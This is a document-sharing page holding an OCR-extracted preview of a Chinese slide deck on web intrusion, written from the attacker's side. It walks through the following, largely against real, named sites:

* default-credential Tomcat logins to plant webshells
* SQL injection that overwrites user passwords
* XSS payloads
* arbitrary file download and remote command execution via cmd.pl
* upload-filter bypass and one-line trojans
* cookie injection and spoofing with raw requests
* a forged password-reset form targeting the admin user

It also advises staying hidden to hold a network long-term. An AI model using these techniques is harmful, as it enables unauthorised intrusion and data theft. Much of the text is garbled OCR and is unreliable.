入侵思路-攻擊篇-常見WEB攻擊_第1頁
入侵思路-攻擊篇-常見WEB攻擊_第2頁
入侵思路-攻擊篇-常見WEB攻擊_第3頁
入侵思路-攻擊篇-常見WEB攻擊_第4頁
入侵思路-攻擊篇-常見WEB攻擊_第5頁
已閱讀5頁,還剩49頁未讀 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

第一部分常見WEB攻擊一.按傳統(tǒng)攻擊分類,大概有以下幾階段5.攻擊內(nèi)部主機(jī)或網(wǎng)絡(luò),建立外連通道6.擴(kuò)大內(nèi)部網(wǎng)絡(luò)攻擊滲透的范圍,下載傳輸內(nèi)部網(wǎng)絡(luò)的資料9.盡量是內(nèi)部網(wǎng)絡(luò)和外部入口設(shè)備和機(jī)器保持網(wǎng)絡(luò)管理員看起來的正常,減少網(wǎng)絡(luò)傳輸?shù)念l率,保證能長期占領(lǐng)該網(wǎng)絡(luò)二.下面就直接講入侵的傳統(tǒng)手法2.弱口令猜解,溢出,WEB滲透的辦法,另外還有最后就是社會工程的方法搞定外部入口本可用的方法首先就是溢出,大家可以去看看ODAY實在沒有就去找找發(fā)布過的1DAY但是一般的沒有太大的成功幾率.3.1.目錄瀏覽UDimtciqfPer/■hta<xBj>Firv^xift(5iE)Miy)蒔刮⑨書徑迪案呵?帥M棲E兇ifl?沖助的33DirectoryListingFor/JiTttpJSizeFilenameSizei0,1kb0.6kb23kb1.0kb4.4kb0Akb1.8kb&5kbJ1.0kb0.7kbLastModinTue.19Nov2002D0;45:13GrFrL08Oct200406:25:50Gt'"Fri,05Sep200303:39:24GtTuo.19Nov200200:45:20GtToe,19Now2002D0:4&:20G?Tue,19Nov200200:45:20GtinFT!F氏OflOct2004D&:24:52Glr^tMen,25oa2OT4D3;40;16列Fri.OBOct200406:25:04GtFrtOCoa2004陽:25;2OGtFrLOBOct200406:25:22GtFri,(WO<t20W06:25:32GtFrL0EOct2W406:25:38Gt所有文件的名稱,可以查看到docquery目錄下的3.2.備份頁面暴源碼&輟&輟S9FViCB(Ioincn[-5iai>dalcme)曾LJhesQureeB5Data2Mail0EnviranmertEntries?管理員為了維護(hù)的方便,會在web頁面的目錄保存頁文件,或者是由于某些編輯軟件自動生成bak為擴(kuò)展名的頁面文件,導(dǎo)致在瀏覽器直接可以查看頁面文件源代碼33默認(rèn)管理頁面漏洞TTOMCATWEBSERVER曾就Twrrtal:ServerServiceService(Tomcat-Standalone)ServiceActinonsAvailableActicms'---ServicePropertiesProp^fl^Name:ValbeTQUicat-Staodalooc'¥UM珈Dtffimliion*Uwr&綁RolesRes?EnginePropertiesName:Standdme|l?calho?t二|Res?安裝的是tomcat,存在默認(rèn)管理頁面使用默認(rèn)的賬號密碼可以登錄。通過上傳木馬可以輕易就獲得WEBSHELL比如,http://IP/Page.jsp?City二天津D:YNHACKUSER../inc/cls_main.asp網(wǎng)站路徑管,第一個管理員用戶名長度小于乙第一個管理員用戶名長b086f71d080453fa,第三個靈男密碼581abc28e23d1669,后面的工作我就不作了,如果拿到解密后的密碼進(jìn)入后臺輕易得到WEBSHELL漏洞測試網(wǎng)站二:新云官方網(wǎng)站sertintonc_user(uvalues('123','ac590可能數(shù)據(jù)庫中有這個用戶了吧,那我們它密碼updatenc_usersetpassword二'ac59075b964b0715'whereusername二'123',成功。現(xiàn)在利用輔助工具注入,前提是要登陸,不好意思,要用WEBSHE啲事,我就不去搞了。大家自3.5登陸驗證不嚴(yán)不合格登陸輸入conetmibverl.O漏洞直接進(jìn)入后臺構(gòu)建鏈接http://IP/IDC.jsp?Sex二男&Sex二女&strArea=0”><script>alert(JAVASCRIPT對話框“HELLO,MATRIXAY!3.7任意文件被下載https://ip/download.jsp?downpath二down.jsp3.8暴露絕對路徑提交特殊參數(shù),導(dǎo)致頁面出錯,暴露頁面文件的絕對路徑序中的服勞器W9■rtdlaligin-"rif|ht:bidtt?nid-vfatnClEar'Jrunftt-"5Wk-ir^[SqKKMptiD.nivarchflj-JriWwtier<1-1—r押嗅比窗包%“nt旺氏打豎三罄圭羅富―]5ySt*fl-D?r?r5flTclient,5qlCertH*fid,Si.iCUit*Rfiidtr(C-oncind&e*iiMiQrcnciB?hB.MiorB卻“乂山細(xì)中疔則iBitiit呻葉BWIMPIEEjyfitefi.CXbti.Sigicli?nt.Sqlqtmiuid,EKieciAttHgjiiqufryO,1^4-Df?EI4et_HiirrsrSi*^ie.5q1h^lper.SqTHelper-ExecuteSfi[5qlEonnrrtiancannect-iqn,Stringi$t:口r*-eProceduce-h^He.S^liPar*n^t口D匚Net_^irrofrXite.C>ore.ShawDatfi.5hc?Artic:ledleliarMp(stringChfilD.StringLeafip,String^hi-k21dDRC.Net_HiirrBrSite.Mefa.?irCjintent.^rtC1asjKmseO〒瞇fl^iP.reainCanterrt_aispM.._RwiderFonul(ItbnlT£^\riter_output.C-nfitralpnrafreterCan.tainer)inD:,>1M£Net-Z&KS',i.web\?Syaten^li^].bliCarrtrn-l.fienderCh-ilcfr-HitittBlwriter)+27h^b.LEl.tHsilCwitrolla...MffcnlFfiefiderChiIdrEn(H±m(xù)lTeitlfriierw^-Btcr}+44Sysbffeh?UI.rtt^Krnnt^ols.FQCF?RwderCrftiinlTt^tbrritertwtuut)+262System,taeb.m,Control?a*ndtrC&fltro1(HtnctTegitwritarwriter)*2JiIflrtMWl胡即dbCR訶鮎蚪護(hù)i*封"譏*72lifti..m,Contr#l,WendtiT(hrtnlTeMtWittr5yit4?-fcif*,UI,.UrndfrrCipfltrqlKtiL.m.F罩鼻e?PraccssRieque^t^ibin(}*1?ZG*7writrr)乜科■*4嗣:MicnMftNETTftnwworlii1樣2S和眩ASP.hCTl.1^a222WSEhttp://IP/cmd.pl?dir+c:\服務(wù)器存在類似的腳本解釋程序,可以執(zhí)行服務(wù)器上的命令3.10存在upload.asp等類似文件上傳文件的利用可以使用桂林老兵等上傳程序突破文件名限制上傳3.11php腳本遠(yuǎn)程文件包含漏洞.php腳本沒有正確地驗證某些變量的數(shù)欺騙漏洞session("idu")二"black-you"進(jìn)后臺看看吧!!3.13cookies注入ifname<>""thensql=sql&"andnamelike'%"&name&"%'"sql=sql&"andmarklike'%"&manufacturer&"%'"“504%注入語句’%504就能注入了,抓包然后把地址放在NBSI里就能注入3.14cookies欺騙漏洞來看看它的來看看它的setrs二server.CreateObject("adodb.recordset")ifnotisempty(request("SubmitRePws"))thenifrequest("password")v>request("pasn"selectpasswordfrom[user]whereusername=”‘&trim(requecallMsgBox("您的密碼取回成功,請登錄!","GoUrl","callMsgbox("對不起,您輸入的問題答案不正確”,"Back","None")Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-http://localhost/ltContent-Length:72Cookie:ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOFpassword=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&u修改就把ueername禾口password、possword2還有Content-LMicrosoftUindotj?XP:^Jiackei*\nc>nc:^Jiackei*\nc>nclocalliost80<1.httn:^Jiackei*\nc>nc:^Jiackei*\nc>nclocalliost80<1.httn”姦;;3.15—句話木馬插入到數(shù)據(jù)庫當(dāng)中網(wǎng)絡(luò)呼機(jī)網(wǎng)絡(luò)呼機(jī)AIIRightsReserve3.16本地存網(wǎng)頁欺騙服務(wù)器TRSWAS安全漏洞利用方法:詳見“C:\temp\SQL注入相關(guān)\TRS用.html”vLINKhref二"./style.css"rel二stylesheet〉vSCRIPTIanguage二Javascript〉<!--functionJustifyNull1(field){varRet二truevarstr=""+field.valuefield.value二""}functionCheckForm(){if(!JustifyNull1(frmUser.NewPassword)){frmUser.NewPassword.focus();}elseif(frmUser.NewPassword.value.length<8||frmUserfrmUser.NewPassword.focus();}elseif(!JustifyNull1(frmUser.ConfirmPassword)){frmUser.ConfirmPassword.focus();}elseif(frmUser.ConfirmPassword.value!二frmUser.NewPassword.vfrmUser.ConfirmPassword.focus();}>v/SCRIPT>v/HEAD><BODYclass二bgcolor〉vTABLEalign=centerborder=OcellPadding=OcellSpacing=0width二"<FORMname="frmUser"method="post"action="http://www.trs.ccn:9000/wcm/user/findpassword/changepasswordsucc.jsp"onsuvinputtype二"hidden"name="UserName"value="admin"><TABLEborder=0cellPadding=8cellSpacing=0>v/TR>v/TBODY>v/TABLE>vTABLEalign=centerborder=OcellPadding=OcellSpacing=0width=5<TABLEborder=1borderColorDark=#ffffffborderColorLight二#000000<P><FONTcolor=#ffffff>修改密碼v/FONT>v/P>v/TD><TD> </td></TR>vTDwidth二"30%">請輸入您的新密碼:</td>vtdwidth二"70%"><inputtype二"password"name二"NewPassword"size二vtdwidth二"70%"><inputtype二"password"name二"ConfirmPassword"sizev/FONT>v/TBODY>v/TABLE>vINPUTalt二"確"type="image"src="../../images/button-submit.gif">vIMGalt二"取消操"border=0height=21src="../../images/button-cancle.gif"onMouseOver="this.style.cursor='hand'"onclic<br>密碼修改成功后,您可以直接用此密碼登錄系統(tǒng)<P>vFONTstyle二"FONT-SIZE:9pt">Copyright1998-2000<Ahref二""target=_blank>TRS司</A>Allrightsreserved.信息技術(shù)有限公vDIValign二right><BR>v/DIV>v/TD>v/TR>v/TBODY>v/TABLE>v/FORM>v/BODY>3.17下載數(shù)據(jù)庫文件.tw/Comersus/database/comersus.mdb下載數(shù)據(jù)庫后臺管理界面http:/..ww,77169-rQinR遠(yuǎn)和孌l|用戶謝表|用尸科陋|用戶申瀟|念主日記|餞用帶朋(JK本說明■保密日記:女人vs舅人〔星期聞不要下不要下我們先來看一下inc文件夾下的數(shù)據(jù)庫連接文件conn.asp,我把它的代碼復(fù)制到下面:db="data/aqbt.cn.asp"setconn=Server.CreateObject("ADODB.Connection")sqlstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath("”&db&"")dimlistnum,reguservalue''定義每頁顯示日記數(shù)量'首頁顯示的新日記數(shù)'首頁顯示的推薦會員數(shù)'過濾非法字符functionHTMLEncode(fString)n■口-1*嘩;」叱*巧些竺|hJLl|"2卽I?ficTweftJET41>Qui:eEngine罠J30004005*為:淨(jìng)炬天堂日記寧応如薊心tmg;不星一f有絞的谿承fllJtlS社苕祥捋耳星否正!!■處

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論